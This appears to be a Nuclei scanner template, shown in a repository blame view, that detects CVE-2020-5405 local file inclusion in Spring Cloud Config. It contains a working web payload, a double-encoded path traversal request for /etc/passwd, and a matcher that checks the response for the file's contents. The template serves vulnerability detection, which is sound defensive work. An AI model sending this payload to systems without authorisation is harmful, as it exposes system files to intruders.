nuclei-templates/http/cves/2020/CVE-2020-5405.yaml

44 lines
1.5 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-5405
info:
name: Spring Cloud Config - Local File Inclusion
2021-06-09 12:20:56 +00:00
author: harshbothra_
severity: medium
description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module.
2023-09-06 12:22:36 +00:00
remediation: |
Upgrade to a patched version of Spring Cloud Config or apply the recommended security patches to mitigate the vulnerability.
reference:
- https://pivotal.io/security/cve-2020-5405
- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
cvss-score: 6.5
cve-id: CVE-2020-5405
cwe-id: CWE-23,CWE-22
epss-score: 0.00258
epss-percentile: 0.63277
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: vmware
product: spring_cloud_config
tags: cve,cve2020,lfi,springcloud
http:
- method: GET
path:
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
2023-07-11 19:49:27 +00:00
2020-07-06 17:10:05 +00:00
matchers-condition: and
matchers:
2020-07-06 17:10:05 +00:00
- type: regex
2023-07-11 19:49:27 +00:00
part: body
2020-07-06 17:10:05 +00:00
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4b0a004830460221009efc72370e3821d74ee4bd27be38197ad977f117479afa7bf5e6202177c6a1c5022100d76899fc1c936d7adf032a9ae2c45d4c17b69d8b4d31b64bdfd7ae28cbb5f929:922c64590222798bb761d5b6d8e72950